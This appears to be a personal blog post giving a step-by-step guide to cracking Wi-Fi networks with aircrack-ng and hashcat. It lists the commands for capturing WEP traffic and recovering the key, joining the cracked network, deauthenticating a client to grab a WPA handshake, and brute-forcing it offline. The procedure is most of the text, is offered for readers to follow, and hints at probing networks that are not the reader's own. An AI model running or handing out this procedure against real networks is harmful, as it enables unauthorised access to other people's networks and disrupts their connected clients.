Steve Borba

My notes, I hope they help you, feel free to comment/add to them

Wireless Cracking (with Kali and Aircrack)

I have been told how insecure WEP is and that it should not be used, but I didn’t know how bad it was till I did this. First one I did fell within a day, the next fell within an hour and the third four hours – so it wasn’t just luck. But now for you to see how easy, here is how:

First off we need to get the wireless adapter working; there are lots of article out there about that, so I am not gonna spend to much time covering it. A couple hints I can give are to get NetworkManager to stop messing with interface, add this to /etc/network/interfaces:

iface wlan0 inet manual
        up ifconfig wlan0 up promisc

To check if it stopped messing with it, run this (you may need to restart network-manager).

nmcli dev status

you want to see this “wlan0 wifi unmanaged”, if it doesn’t try this

nmcli dev set wlan0 managed no

Then we need to start monitoring:

airmon-ng start wlan0

(On one of my PCs, it created a vertual sub interface and on another, it didn’t)

Then we need to start looking around for a network to attempt to crack

airodump-ng wlan0mon

AirodumpSearch

Now we want to capture, but make sure we stay on the channel (this case 6) so we can get as many IVs as possible (when you are scanning through the channels, you miss some).

airodump-ng wlan0mon -w channel6 -c 6

We need to run that till we have enough IVs (#Data column – I cracked one with 8,000 but that was lucky – you are more likely with more, 47,000 for this one), after running it for a while, you need to attempt to crack it (you can do this in another window and leave the dump going)

aircrack-ng channel*.cap

WEPCrackedWithAircrack

Now to get on the network:

airmon-ng stop wlan0
iwconfig wlan0 essid "<ESSID>"
iwconfig wlan0 key XXXXXXXXXX
iwconfig wlan0 enc on

Ok, so you are on that network, now what? Well, that is out of scope for this, but tcpdump is a good start, grabbing an ip “dhclient wlan0” and nmap, but if it isn’t your network, you might not want to do that.

WPA

With WPA you want to grab a handshake and then offline crack it. A handshake happens when a client joins the network, and you can force it by Deauth’ing a client.

aireplay-ng wlan0mon -0 1 -a {BSSID MAC} -c {STATION MAC}

At the top of the you’ll see “WPA handshake: 00:18:0A:XX:XX:XX” when it happens. Then you convert it to a hashcat file (or use aircrack with a dictionary “aircrack-ng channel*.cap -w full-dictionary”)

wpaclean {out.cap} {in.cap}
aircrack-ng {in.cap} -J {out prefix}

To use hash cat, here are a couple examples; hashcat is a huge beast and I will be doing another post with more ideas and commands.

hashcat -m 2500 hash.hccap dictionary
hashcat -m 2500 -a 3 hash.hccap ?d?d?d?d?d?d?d?d?d?d

 

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>